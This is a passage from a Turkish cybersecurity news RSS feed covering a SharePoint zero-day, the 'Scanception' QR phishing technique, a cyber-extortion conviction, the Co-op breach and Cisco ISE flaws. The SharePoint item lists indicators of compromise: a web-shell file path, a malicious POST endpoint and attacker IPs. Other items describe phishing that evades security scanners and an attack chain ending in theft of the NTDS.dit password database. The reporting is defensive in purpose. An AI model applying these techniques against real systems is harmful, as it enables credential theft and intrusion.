<p data-start="1819" data-end="2084">Eye Security CTO’su Piet Kerkhofs, saldırıların dünya çapında 85'ten fazla sunucuyu etkilediğini, yapılan kümeleme çalışmaları sonucunda ise <em data-start="1960" data-end="1998">29 kurumun doğrudan hedef alındığını</em> açıkladı. Bu kurumlar arasında çok uluslu şirketler ve devlet kurumları da bulunuyor.</p>
<p data-start="2086" data-end="2394"><strong data-start="2086" data-end="2128">Henüz yama yok, geçici önlem önerileri</strong><br data-start="2128" data-end="2131">Microsoft, açığa yönelik resmi bir güvenlik yaması yayımlanmadığını belirtti. Geçici önlem olarak, <em data-start="2230" data-end="2265">AMSI (Antimalware Scan Interface)</em> entegrasyonunun aktif hale getirilmesi ve tüm SharePoint sunucularında <em data-start="2337" data-end="2357">Defender Antivirus</em> kurulmasının önerildiği bildirildi.</p>
<p data-start="2396" data-end="2711">Bu özellik, Eylül 2023’ten itibaren yayımlanan güvenlik güncellemeleriyle varsayılan olarak etkinleştirilmiş durumda. Ancak manuel kurulum yapan ya da güncelleme almayan sistemlerde etkin olmayabileceği belirtiliyor. Microsoft, AMSI etkinleştirilemeyen sistemlerin internet bağlantısının kesilmesini tavsiye ediyor.</p>
<p data-start="2713" data-end="2875"><strong data-start="2713" data-end="2756">İhlal tespit yöntemleri ve göstergeleri</strong><br data-start="2756" data-end="2759">Microsoft ve Eye Security, saldırıya uğrayan sistemleri tespit edebilmek için aşağıdaki Göstergeleri (IOC) paylaştı:</p>
<ul data-start="2877" data-end="3237">
<li data-start="2877" data-end="3006">
<p data-start="2879" data-end="3006"><code data-start="2879" data-end="2985">C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx</code> dosyasının varlığı</p>
</li>
<li data-start="3007" data-end="3085">
<p data-start="3009" data-end="3085">IIS loglarında <code data-start="3024" data-end="3052">/_layouts/15/ToolPane.aspx</code> adresine POST isteği yapılması</p>
</li>
<li data-start="3086" data-end="3145">
<p data-start="3088" data-end="3145">HTTP Referer bilgisinin <code data-start="3112" data-end="3136">/_layouts/SignOut.aspx</code> olması</p>
</li>
<li data-start="3146" data-end="3237">
<p data-start="3148" data-end="3237">Şu IP adreslerinden gelen bağlantılar: <code data-start="3187" data-end="3202">107.191.58.76</code>, <code data-start="3204" data-end="3221">104.238.159.149</code>, <code data-start="3223" data-end="3237">96.9.125.147</code></p>
</li>
</ul>
<p data-start="3239" data-end="3406">Bu belirtilere rastlanan sistemlerin derhal ağ bağlantısının kesilmesi, sistemlerin çevrimdışı alınması ve kapsamlı güvenlik analizleri yapılması gerektiği vurgulandı.</p>
<p data-start="3408" data-end="3570">Uzmanlar, bazı güvenlik duvarlarının bu saldırıları durdurabildiğini belirtse de, imza tabanlı korumanın aşılması halinde yayılımın artabileceğine dikkat çekiyor.</p>
<p data-start="3572" data-end="3754"><strong data-start="3572" data-end="3584"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yeni Nesil QR Kodu Tuzağı: Masum PDF’lerle Gelen Büyük Tehlike! Kimlik Bilgilerinizi Böyle Çalıyorlar!</title>
            <link>https://cumha.com.tr/yeni-nesil-qr-kodu-tuzagi-masum-pdflerle-gelen-buyuk-tehlike-kimlik-bilgilerinizi-boeyle-caliyorlar</link>
            <guid>https://cumha.com.tr/yeni-nesil-qr-kodu-tuzagi-masum-pdflerle-gelen-buyuk-tehlike-kimlik-bilgilerinizi-boeyle-caliyorlar</guid>
            <description><![CDATA[ Son dönemde siber güvenlik uzmanlarının dikkatini çeken “Scanception” adlı yeni bir saldırı türü, masum görünen PDF dosyaları içine gizlenmiş QR kodlarla kullanıcıların kimlik bilgilerini hedef alıyor. Bu yöntem, profesyonel görünümlü belgeler ve güvenli bağlantılarla kandırarak, e-posta ve şifre gibi bilgileri sessizce ele geçiriyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687d0f6a3433c.webp" length="30822" type="image/webp"/>
            
            <pubDate>Sun, 20 Jul 2025 18:47:08 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>qr kodlarla kimlik bilgileriniz çalınabilir mi, scanception saldırısı nedir ve nasıl çalışır, pdf belgeleri neden artık güvenli değil bu saldırılardan nasıl korunabiliriz, şirketler qr kodla gelen tehditlere hazır mı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Siber güvenlik dünyasında yeni bir tehdit kapıda: <strong>Scanception saldırısı</strong>. Son dönemde artış gösteren bu saldırı türü, özellikle kurumsal çalışanları hedef alıyor. Masum görünümlü PDF dosyalarına yerleştirilen QR kodlar sayesinde kullanıcıların bilgileri çalınıyor.</p>
<p>İlk olarak <strong>2024’ün sonlarında</strong> fark edilen bu yöntem, <strong>2025 ortalarında</strong> çok sayıda ülkede gözlemlenmeye başladı. Özellikle <strong>ABD, Avrupa ve Türkiye</strong>'deki bazı kurumlara yönelik kampanyalarda bu yöntem kullanıldı.</p>
<p>Saldırıların ana hedefinde:</p>
<ul style="margin-top: 0; padding-left: 20px;">
<li>Şirket çalışanları</li>
<li>Kurumsal e-posta kullanıcıları</li>
<li>İnsan kaynakları ve muhasebe departmanları</li>
</ul>
<p>bulunuyor. Ancak bu yöntem, genel kullanıcıları da tuzağa düşürebilecek kadar etkili.</p>
<p>Saldırganlar profesyonel olarak hazırlanmış PDF dosyalarının <strong>son sayfasına</strong> bir <strong>zararlı QR kod</strong> yerleştiriyor. Bu kod:</p>
<ul style="margin-top: 0; padding-left: 20px;">
<li>Google, YouTube gibi güvenilir siteler üzerinden yönlendirme yaparak güven kazanıyor.</li>
<li>Kullanıcıyı sahte giriş ekranlarına götürüyor ve <strong>e-posta/şifre</strong> bilgilerini çalıyor.</li>
<li>Güvenlik test araçları (Selenium, Burp Suite vb.) tespit edildiğinde, analizleri engellemek için <code>about:blank</code> sayfasına yönlendiriyor.</li>
</ul>
<p>Bu saldırı, klasik phishing yöntemlerinden çok daha sofistike:</p>
<ul style="margin-top: 0; padding-left: 20px;">
<li>Güvenlik yazılımlarının çoğu <strong>ilk sayfayı taradığı için</strong> bu saldırı kolayca gözden kaçabiliyor.</li>
<li>PDF belgeleri <strong>resmi göründüğü için</strong> insanlar QR kodları gönül rahatlığıyla tarayabiliyor.</li>
<li>Güvenli servisler üzerinden yapılan yönlendirmeler <strong>güven algısını artırıyor</strong>.</li>
</ul>
<p>Uzmanlar, bu tür saldırıların daha da yaygınlaşabileceği konusunda uyarıyor. Kurumların çalışanlarına <strong>QR kod okutmadan önce içeriğin doğruluğunu sorgulama eğitimi</strong> vermesi gerektiğini vurguluyorlar.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD Ordusu mensubu eski asker, 10 teknoloji ve telekom şirketine siber şantajdan suçlu bulundu</title>
            <link>https://cumha.com.tr/abd-ordusu-mensubu-eski-asker-10-teknoloji-ve-telekom-sirketine-siber-santajdan-suclu-bulundu</link>
            <guid>https://cumha.com.tr/abd-ordusu-mensubu-eski-asker-10-teknoloji-ve-telekom-sirketine-siber-santajdan-suclu-bulundu</guid>
            <description><![CDATA[ 21 yaşındaki eski ABD askeri Cameron John Wagenius, 2023-2024 yılları arasında AT&amp;T, Verizon ve sekiz farklı şirkete yönelik veri hırsızlığı ve fidye taleplerinden suçlu olduğunu kabul etti. Aktif görevdeyken gerçekleştirdiği eylemler için 27 yıla kadar hapis cezası isteniyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687a36e79f721.webp" length="49940" type="image/webp"/>
            
            <pubDate>Fri, 18 Jul 2025 13:09:46 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Hangi şirketler hedef alındı, Wagenius kimlerle birlikte hareket etti, siber saldırılar nasıl gerçekleştirildi, cezası ne kadar olabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="433" data-end="777">ABD Adalet Bakanlığı, eski bir Amerikan askeri olan <strong data-start="485" data-end="510">Cameron John Wagenius</strong>’un, ülke genelinde faaliyet gösteren en az <strong data-start="554" data-end="652">10 teknoloji ve telekomünikasyon şirketine siber saldırı düzenlediğini ve fidye talep ettiğini</strong> açıkladı. 21 yaşındaki Wagenius, 14 Temmuz 2025’te hakkında hazırlanan iddianamenin ardından <strong data-start="746" data-end="776">üç suçlamayı da kabul etti</strong>.</p>
<p data-start="779" data-end="1059">Wagenius, Texas’ta 20 Aralık 2024’te gözaltına alınmış, <strong data-start="835" data-end="882">gizli telefon kayıtlarının izinsiz aktarımı</strong> suçlamasıyla Washington Batı Bölgesi Mahkemesi’nde yargılanmaya başlamıştı. 2025 Şubat ayında ise AT&amp;T ve Verizon’a yönelik hack eylemleriyle ilgili olarak da suçlu bulunmuştu.</p>
<p data-start="1061" data-end="1492"><strong data-start="1061" data-end="1101">Siber takma adlarla faaliyet yürüttü</strong><br data-start="1101" data-end="1104">Adalet Bakanlığı’na göre Wagenius, <strong data-start="1139" data-end="1173">“kiberphant0m”, “cyb3rph4nt0m”</strong> ve <strong data-start="1177" data-end="1192">“buttholio”</strong> gibi takma adlarla yeraltı siber forumlarında aktifti. 2023 Nisan – 2024 Aralık tarihleri arasında, diğer kişilerle birlikte çalışarak kurumlara ait sistem giriş bilgilerini ele geçirdi ve bu şirketlere ait verileri sızdırmakla tehdit ederek <strong data-start="1435" data-end="1491">500 bin ila 1 milyon dolar arasında fidye talep etti</strong>.</p>
<p data-start="1494" data-end="1663">Elde edilen bilgilere göre, ekip Telegram üzerinden organize oldu, çalınan parolaları paylaştı ve “SSH Brute” adlı özel bir saldırı aracıyla sistemlere erişim sağladı.</p>
<p data-start="1665" data-end="1896">Ayrıca <strong data-start="1672" data-end="1709">SIM kart kopyalama (SIM-swapping)</strong> yöntemleriyle de kullanıcı hesaplarına ulaşıldığı, çalınan verilerin bir kısmının çeşitli siber suç forumlarında satıldığı veya dolandırıcılık faaliyetlerinde kullanıldığı tespit edildi.</p>
<p data-start="1898" data-end="2238"><strong data-start="1898" data-end="1945">Fidye talepleri ve veri sızdırma tehditleri</strong><br data-start="1945" data-end="1948">Wagenius, mağdurlardan birine gönderdiği mesajda, <strong data-start="1998" data-end="2048">358 GB’lik veri sızıntısı tehdidinde bulunarak</strong> iletişime geçilmesini ve ödeme yapılmasını talep etti. Bir başka şirkete gönderdiği e-postada ise <strong data-start="2147" data-end="2186">500 bin dolar değerinde kripto para</strong> karşılığında verilerin sızdırılmayacağını belirtti.</p>
<p data-start="2240" data-end="2404">Yetkililer, Wagenius’un bu faaliyetleri <strong data-start="2280" data-end="2347">aktif görevdeyken, ABD Ordusu mensubu olarak gerçekleştirdiğini</strong> ve bu durumun davanın ağırlığını artırdığını ifade etti.</p>
<p data-start="2406" data-end="2677"><strong data-start="2406" data-end="2439">Ceza ekim ayında belli olacak</strong><br data-start="2439" data-end="2442">Wagenius hakkında hazırlanan son iddianamede, <strong data-start="2488" data-end="2569">bilişim dolandırıcılığına yönelik komplolar, ağır kimlik hırsızlığı ve şantaj</strong> suçlamaları yer alıyor. Kabul edilen tüm suçlamalar sonucunda <strong data-start="2632" data-end="2664">en fazla 27 yıl hapis cezası</strong> öngörülüyor.</p>
<p data-start="2679" data-end="2834">Mahkeme, daha önce telefon kayıtlarının yasa dışı aktarımı suçundan kabul edilen suçlar için de ek ceza verip vermeyeceğini <strong data-start="2803" data-end="2833">6 Ekim 2025’te açıklayacak</strong>.<strong data-start="2841" data-end="2853"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Co-op, 6.5 milyon üyenin kişisel verilerinin siber saldırıda ele geçirildiğini doğruladı</title>
            <link>https://cumha.com.tr/co-op-65-milyon-uyenin-kisisel-verilerinin-siber-saldirida-ele-gecirildigini-dogruladi</link>
            <guid>https://cumha.com.tr/co-op-65-milyon-uyenin-kisisel-verilerinin-siber-saldirida-ele-gecirildigini-dogruladi</guid>
            <description><![CDATA[ Birleşik Krallık’ın en büyük tüketici kooperatiflerinden Co-op, Nisan 2025’te yaşanan siber saldırıda 6,5 milyon üyeye ait kişisel verilerin kopyalandığını açıkladı. DragonForce fidye yazılımıyla bağlantılı saldırının sosyal mühendislik yoluyla başlatıldığı, olayın Scattered Spider grubu ile ilişkilendirildiği bildirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687a32ec06986.webp" length="40088" type="image/webp"/>
            
            <pubDate>Fri, 18 Jul 2025 13:09:44 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Co-op üyelerinin hangi verileri sızdırıldı, saldırı nasıl gerçekleştirildi, saldırganlar kimlerle bağlantılı, NCA kimleri gözaltına aldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="473" data-end="816">Birleşik Krallık merkezli perakende zinciri <strong data-start="517" data-end="547">Co-op (Co-operative Group)</strong>, Nisan ayında gerçekleşen siber saldırı sonucu <strong data-start="595" data-end="649">6,5 milyon üyeye ait kişisel verilerin çalındığını</strong> resmen duyurdu. Şirket CEO’su <strong data-start="680" data-end="702">Shirine Khoury-Haq</strong>, BBC Breakfast programında yaptığı açıklamada, saldırganların tüm üye verilerine erişip kopyaladığını ifade etti.</p>
<blockquote data-start="818" data-end="1011">
<p data-start="820" data-end="1011">“Veriler kopyalandı ve saldırganlar bunlara erişim sağladı. Bu durum, diğer kuruluşlarda yaşanan siber saldırılarla aynı şekilde işledi. Bu, maalesef olayın en korkunç yanı,” dedi Khoury-Haq.</p>
</blockquote>
<p data-start="1013" data-end="1175">Şirket, herhangi bir finansal bilgi veya işlem verisinin sızdırılmadığını belirtse de, üyelerin <strong data-start="1109" data-end="1131">iletişim bilgileri</strong>nin saldırganların eline geçtiği doğrulandı.</p>
<p data-start="1177" data-end="1697"><strong data-start="1177" data-end="1236">Saldırı zinciri: Sosyal mühendislik ve parola resetleme</strong><br data-start="1236" data-end="1239">Saldırının 22 Nisan 2025 tarihinde başladığı, tehdit aktörlerinin bir Co-op çalışanını hedef alan sosyal mühendislik yöntemiyle sisteme giriş yaptığı öğrenildi. Parolayı sıfırlayarak sisteme erişim sağlayan saldırganlar, daha sonra şirketin <strong data-start="1480" data-end="1508">Windows Active Directory</strong> veritabanı olan <strong data-start="1525" data-end="1537">NTDS.dit</strong> dosyasını ele geçirdi. Bu dosya, sistemdeki kullanıcı hesaplarının parola özetlerini içeriyor ve çevrimdışı şekilde kırılarak tüm ağa yayılmayı mümkün kılıyor.</p>
<p data-start="1699" data-end="2242"><strong data-start="1699" data-end="1760">DragonForce fidye yazılımı ve Scattered Spider bağlantısı</strong><br data-start="1760" data-end="1763">Saldırının ardından şirket birçok BT sistemini çevrimdışı hale getirmek zorunda kaldı. Yapılan ilk açıklamalarda olay "girişim niteliğinde" değerlendirilmişti. Ancak sonrasında önemli miktarda verinin sızdırıldığı doğrulandı. Siber güvenlik kaynakları, saldırının <strong data-start="2027" data-end="2046">Marks &amp; Spencer</strong>’a yapılan ve <strong data-start="2060" data-end="2090">DragonForce fidye yazılımı</strong> kullanılan saldırıyla benzerlik gösterdiğini, saldırıların arkasında <strong data-start="2160" data-end="2180">Scattered Spider</strong> adlı grupla bağlantılı tehdit aktörlerinin olduğunu bildirdi.</p>
<p data-start="2244" data-end="2462">BBC, fidye yazılımı operatörü DragonForce ile iletişime geçtiklerini ve saldırının bir ortağı tarafından gerçekleştirildiğinin doğrulandığını aktardı. DragonForce, BBC ile Co-op’a ait bazı veri örneklerini de paylaştı.</p>
<p data-start="2464" data-end="2819"><strong data-start="2464" data-end="2498">NCA dört kişiyi gözaltına aldı</strong><br data-start="2498" data-end="2501">İngiltere Ulusal Suç Teşkilatı (NCA), Co-op ve Marks &amp; Spencer saldırılarıyla bağlantılı olduğundan şüphelenilen <strong data-start="2614" data-end="2647">dördü genç toplam dört kişiyi</strong> geçtiğimiz hafta gözaltına aldı. Zanlılar arasında 17, 19 ve 20 yaşlarında kişilerin bulunduğu, gözaltıların Londra ve West Midlands bölgelerinde gerçekleştiği bildirildi.</p>
<p data-start="2821" data-end="3089">Bu kişilerden birinin, <strong data-start="2844" data-end="2959">2023 yılında MGM Resorts’a yönelik gerçekleştirilen ve 100’den fazla sanal sunucunun şifrelenmesiyle sonuçlanan</strong> fidye yazılımı saldırısıyla da bağlantılı olduğu iddia ediliyor. O saldırı da yine Scattered Spider grubuyla ilişkilendirilmişti.</p>
<p data-start="3091" data-end="3289">CEO Khoury-Haq, yaşanan veri ihlalini "kişisel bir saldırı" olarak değerlendirdi ve “Bu olay beni değil, çalışanlarımı ve üyelerimizi hedef aldı. Bu nedenle çok daha kişisel bir anlam taşıyor” dedi.</p>
<p data-start="3296" data-end="3449"><strong data-start="3296" data-end="3308"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Cisco ISE sisteminde keşfedilen kritik açık, kimlik doğrulama öncesi komut çalıştırmaya izin veriyor</title>
            <link>https://cumha.com.tr/cisco-ise-sisteminde-kesfedilen-kritik-acik-kimlik-dogrulama-oencesi-komut-calistirmaya-izin-veriyor</link>
            <guid>https://cumha.com.tr/cisco-ise-sisteminde-kesfedilen-kritik-acik-kimlik-dogrulama-oencesi-komut-calistirmaya-izin-veriyor</guid>
            <description><![CDATA[ Cisco’nun kimlik doğrulama ve erişim kontrol sistemi ISE’de tespit edilen CVE-2025-20337 kodlu güvenlik açığı, uzaktan kimliği doğrulanmamış saldırganların zararlı dosya yüklemesine, komut çalıştırmasına veya root yetkisi elde etmesine olanak tanıyor. Şirket, etkilenen sürümler için acil yama çağrısı yaptı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202507/image_870x_687a333555e10.webp" length="40710" type="image/webp"/>
            
            <pubDate>Fri, 18 Jul 2025 13:09:43 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CVE-2025-20337 açığı nasıl çalışıyor, hangi Cisco sürümleri etkileniyor, hangi yamalar yüklenmeli, diğer güvenlik açıkları hangi ürünleri etkiliyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="470" data-end="781">Cisco, <strong data-start="477" data-end="511">Identity Services Engine (ISE)</strong> platformunu etkileyen ve <strong data-start="537" data-end="583">azami kritiklik puanı olan 10 üzerinden 10</strong> ile derecelendirilen yeni bir güvenlik açığı hakkında uyarıda bulundu. <strong data-start="655" data-end="673">CVE-2025-20337</strong> koduyla izlenen bu açıklık, kullanıcıdan gelen verilerin yeterince doğrulanmaması nedeniyle ortaya çıkıyor.</p>
<p data-start="783" data-end="976">Zafiyet, Japonya merkezli GMO Cybersecurity by Ierae şirketinden araştırmacı <strong data-start="860" data-end="878">Kentaro Kawane</strong> tarafından keşfedildi ve <strong data-start="904" data-end="945">Trend Micro Zero Day Initiative (ZDI)</strong> üzerinden Cisco’ya bildirildi.</p>
<p data-start="978" data-end="1213">Açık, <strong data-start="984" data-end="1031">uzaktan ve kimlik doğrulaması gerekmeksizin</strong> istismar edilebiliyor. Saldırganlar, özel olarak hazırlanmış API istekleriyle sistem üzerinde zararlı dosya yükleyip keyfi komut çalıştırabiliyor ya da root yetkisi elde edebiliyor.</p>
<p data-start="1215" data-end="1556"><strong data-start="1215" data-end="1252">Etkilenen sürümler ve düzeltmeler</strong><br data-start="1252" data-end="1255">Zafiyet, <strong data-start="1264" data-end="1321">Cisco ISE ve ISE-PIC 3.3 ve 3.4 sürümlerini etkiliyor</strong>. Daha önce bildirilen CVE-2025-20281 ve CVE-2025-20282 açıklarıyla birlikte değerlendirildiğinde, bu sürümler tümüyle risk altında bulunuyor. Cisco, bu üç kritik açığın birbirinden bağımsız şekilde istismar edilebileceğini belirtiyor.</p>
<p data-start="1558" data-end="1626">Yalnızca aşağıdaki sürümlerde tüm kritik açıklar kapatılmış durumda:</p>
<div class="_tableContainer_80l1q_1">
<div class="_tableWrapper_80l1q_14 group flex w-fit flex-col-reverse" tabindex="-1">
<table data-start="1628" data-end="1997" class="w-fit min-w-(--thread-content-width)" style="width: 24.153%; height: 88px;">
<thead data-start="1628" data-end="1701">
<tr data-start="1628" data-end="1701" style="height: 22px;">
<th data-start="1628" data-end="1649" data-col-size="sm" style="width: 24.65%;">Ürün Sürümü</th>
<th data-start="1649" data-end="1666" data-col-size="sm" style="width: 24.4769%;">CVE-2025-20281</th>
<th data-start="1666" data-end="1683" data-col-size="sm" style="width: 24.4769%;">CVE-2025-20282</th>
<th data-start="1683" data-end="1701" data-col-size="sm" style="width: 24.4769%;">CVE-2025-20337</th>
</tr>
</thead>
<tbody data-start="1776" data-end="1997">
<tr data-start="1776" data-end="1849" style="height: 22px;">
<td data-start="1776" data-end="1797" data-col-size="sm" style="width: 24.65%;">ISE 3.2 ve öncesi</td>
<td data-start="1797" data-end="1814" data-col-size="sm" style="width: 24.4769%;">Etkilenmiyor</td>
<td data-start="1814" data-end="1831" data-col-size="sm" style="width: 24.4769%;">Etkilenmiyor</td>
<td data-start="1831" data-end="1849" data-col-size="sm" style="width: 24.4769%;">Etkilenmiyor</td>
</tr>
<tr data-start="1850" data-end="1923" style="height: 22px;">
<td data-start="1850" data-end="1871" data-col-size="sm" style="width: 24.65%;">ISE 3.3</td>
<td data-start="1871" data-end="1888" data-col-size="sm" style="width: 24.4769%;">Patch 7</td>
<td data-start="1888" data-end="1905" data-col-size="sm" style="width: 24.4769%;">Etkilenmiyor</td>
<td data-start="1905" data-end="1923" data-col-size="sm" style="width: 24.4769%;">Patch 7</td>
</tr>
<tr data-start="1924" data-end="1997" style="height: 22px;">
<td data-start="1924" data-end="1945" data-col-size="sm" style="width: 24.65%;">ISE 3.4</td>
<td data-start="1945" data-end="1962" data-col-size="sm" style="width: 24.4769%;">Patch 2</td>
<td data-start="1962" data-end="1979" data-col-size="sm" style="width: 24.4769%;">Patch 2</td>
<td data-start="1979" data-end="1997" data-col-size="sm" style="width: 24.4769%;">Patch 2</td>
</tr>
</tbody>
</table>
<div class="sticky end-(--thread-content-margin) h-0 self-end select-none">
<div class="absolute end-0 flex items-end" style="height: 33px;"><span class="" data-state="closed"><button aria-label="Tabloyu kopyala" class="hover:bg-token-bg-tertiary text-token-text-secondary my-1 rounded-sm p-1 transition-opacity group-[:not(:hover):not(:focus-within)]:pointer-events-none group-[:not(:hover):not(:focus-within)]:opacity-0"><svg width="20" height="20" viewBox="0 0 20 20" fill="currentColor" xmlns="http://www.w3.org/2000/svg" class="icon"><path d="M12.668 10.667C12.668 9.95614 12.668 9.46258 12.6367 9.0791C12.6137 8.79732 12.5758 8.60761 12.5244 8.46387L12.4688 8.33399C12.3148 8.03193 12.0803 7.77885 11.793 7.60254L11.666 7.53125C11.508 7.45087 11.2963 7.39395 10.9209 7.36328C10.5374 7.33197 10.0439 7.33203 9.33301 7.33203H6.5C5.78896 7.33203 5.29563 7.33195 4.91211 7.36328C4.63016 7.38632 4.44065 7.42413 4.29688 7.47559L4.16699 7.53125C3.86488 7.68518 3.61186 7.9196 3.43555 8.20703L3.36524 8.33399C3.28478 8.49198 3.22795 8.70352 3.19727 9.0791C3.16595 9.46259 3.16504 9.95611 3.16504 10.667V13.5C3.16504 14.211 3.16593 14.7044 3.19727 15.0879C3.22797 15.4636 3.28473 15.675 3.36524 15.833L3.43555 15.959C3.61186 16.2466 3.86474 16.4807 4.16699 16.6348L4.29688 16.6914C4.44063 16.7428 4.63025 16.7797 4.91211 16.8027C5.29563 16.8341 5.78896 16.835 6.5 16.835H9.33301C10.0439 16.835 10.5374 16.8341 10.9209 16.8027C11.2965 16.772 11.508 16.7152 11.666 16.6348L11.793 16.5645C12.0804 16.3881 12.3148 16.1351 12.4688 15.833L12.5244 15.7031C12.5759 15.5594 12.6137 15.3698 12.6367 15.0879C12.6681 14.7044 12.668 14.211 12.668 13.5V10.667ZM13.998 12.665C14.4528 12.6634 14.8011 12.6602 15.0879 12.6367C15.4635 12.606 15.675 12.5492 15.833 12.4688L15.959 12.3975C16.2466 12.2211 16.4808 11.9682 16.6348 11.666L16.6914 11.5361C16.7428 11.3924 16.7797 11.2026 16.8027 10.9209C16.8341 10.5374 16.835 10.0439 16.835 9.33301V6.5C16.835 5.78896 16.8341 5.29563 16.8027 4.91211C16.7797 4.63025 16.7428 4.44063 16.6914 4.29688L16.6348 4.16699C16.4807 3.86474 16.2466 3.61186 15.959 3.43555L15.833 3.36524C15.675 3.28473 15.4636 3.22797 15.0879 3.19727C14.7044 3.16593 14.211 3.16504 13.5 3.16504H10.667C9.9561 3.16504 9.46259 3.16595 9.0791 3.19727C8.79739 3.22028 8.6076 3.2572 8.46387 3.30859L8.33399 3.36524C8.03176 3.51923 7.77886 3.75343 7.60254 4.04102L7.53125 4.16699C7.4508 4.32498 7.39397 4.53655 7.36328 4.91211C7.33985 5.19893 7.33562 5.54719 7.33399 6.00195H9.33301C10.022 6.00195 10.5791 6.00131 11.0293 6.03809C11.4873 6.07551 11.8937 6.15471 12.2705 6.34668L12.4883 6.46875C12.984 6.7728 13.3878 7.20854 13.6533 7.72949L13.7197 7.87207C13.8642 8.20859 13.9292 8.56974 13.9619 8.9707C13.9987 9.42092 13.998 9.97799 13.998 10.667V12.665ZM18.165 9.33301C18.165 10.022 18.1657 10.5791 18.1289 11.0293C18.0961 11.4302 18.0311 11.7914 17.8867 12.1279L17.8203 12.2705C17.5549 12.7914 17.1509 13.2272 16.6553 13.5313L16.4365 13.6533C16.0599 13.8452 15.6541 13.9245 15.1963 13.9619C14.8593 13.9895 14.4624 13.9935 13.9951 13.9951C13.9935 14.4624 13.9895 14.8593 13.9619 15.1963C13.9292 15.597 13.864 15.9576 13.7197 16.2939L13.6533 16.4365C13.3878 16.9576 12.9841 17.3941 12.4883 17.6982L12.2705 17.8203C11.8937 18.0123 11.4873 18.0915 11.0293 18.1289C10.5791 18.1657 10.022 18.165 9.33301 18.165H6.5C5.81091 18.165 5.25395 18.1657 4.80371 18.1289C4.40306 18.0962 4.04235 18.031 3.70606 17.8867L3.56348 17.8203C3.04244 17.5548 2.60585 17.151 2.30176 16.6553L2.17969 16.4365C1.98788 16.0599 1.90851 15.6541 1.87109 15.1963C1.83431 14.746 1.83496 14.1891 1.83496 13.5V10.667C1.83496 9.978 1.83432 9.42091 1.87109 8.9707C1.90851 8.5127 1.98772 8.10625 2.17969 7.72949L2.30176 7.51172C2.60586 7.0159 3.04236 6.6122 3.56348 6.34668L3.70606 6.28027C4.04237 6.136 4.40303 6.07083 4.80371 6.03809C5.14051 6.01057 5.53708 6.00551 6.00391 6.00391C6.00551 5.53708 6.01057 5.14051 6.03809 4.80371C6.0755 4.34588 6.15483 3.94012 6.34668 3.56348L6.46875 3.34473C6.77282 2.84912 7.20856 2.44514 7.72949 2.17969L7.87207 2.11328C8.20855 1.96886 8.56979 1.90385 8.9707 1.87109C9.42091 1.83432 9.978 1.83496 10.667 1.83496H13.5C14.1891 1.83496 14.746 1.83431 15.1963 1.87109C15.6541 1.90851 16.0599 1.98788 16.4365 2.17969L16.6553 2.30176C17.151 2.60585 17.5548 3.04244 17.8203 3.56348L17.8867 3.70606C18.031 4.04235 18.0962 4.40306 18.1289 4.80371C18.1657 5.25395 18.165 5.81091 18.165 6.5V9.33301Z"></path></svg></button></span></div>
</div>
Cisco, bu açıklar için herhangi bir <strong data-start="2035" data-end="2064">geçici çözüm (workaround)</strong> bulunmadığını, yalnızca sürüm yükselterek korunmanın mümkün olduğunu vurguladı.</div>
</div>
<p data-start="2146" data-end="2330"><strong data-start="2146" data-end="2196">Daha düşük seviyeli diğer açıklar da duyuruldu</strong><br data-start="2196" data-end="2199">Cisco ayrıca, farklı ürünlerde tespit edilen ve orta-yüksek seviyede risk taşıyan şu açıklar için de güvenlik bültenleri yayımladı:</p>
<ul data-start="2332" data-end="2914">
<li data-start="2332" data-end="2496">
<p data-start="2334" data-end="2496"><strong data-start="2334" data-end="2353">CVE-2025-20274:</strong> Cisco Unified Intelligence Center’da, kimliği doğrulanmış kullanıcıların root seviyesinde zararlı dosya yükleyip çalıştırabileceği bir açık.</p>
</li>
<li data-start="2497" data-end="2648">
<p data-start="2499" data-end="2648"><strong data-start="2499" data-end="2518">CVE-2025-20272:</strong> Cisco Prime Infrastructure ve EPNM sistemlerinde REST API üzerinden veri sızdırılmasına neden olabilecek SQL enjeksiyonu açığı.</p>
</li>
<li data-start="2649" data-end="2813">
<p data-start="2651" data-end="2813"><strong data-start="2651" data-end="2684">CVE-2025-20283, 20284, 20285:</strong> Cisco ISE sistemlerinde, yetkili kullanıcıların root komutları çalıştırabileceği ve IP kısıtlamalarını aşabileceği açıklıklar.</p>
</li>
<li data-start="2814" data-end="2914">
<p data-start="2816" data-end="2914"><strong data-start="2816" data-end="2835">CVE-2025-20288:</strong> Unified Intelligence Center’da kimlik doğrulaması gerektirmeyen SSRF zafiyeti.</p>
</li>
</ul>
<p data-start="2916" data-end="3115">Bu açıklar için de yamaların yayımlandığı, fakat <strong data-start="2965" data-end="3009">hiçbirinde geçici önlemlerin bulunmadığı</strong> belirtildi. Cisco, yükseltme öncesinde sistem gereksinimlerinin karşılandığının test edilmesini öneriyor.</p>
<hr data-start="3117" data-end="3120">
<p data-start="3122" data-end="3286"><strong data-start="3122" data-end="3134"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
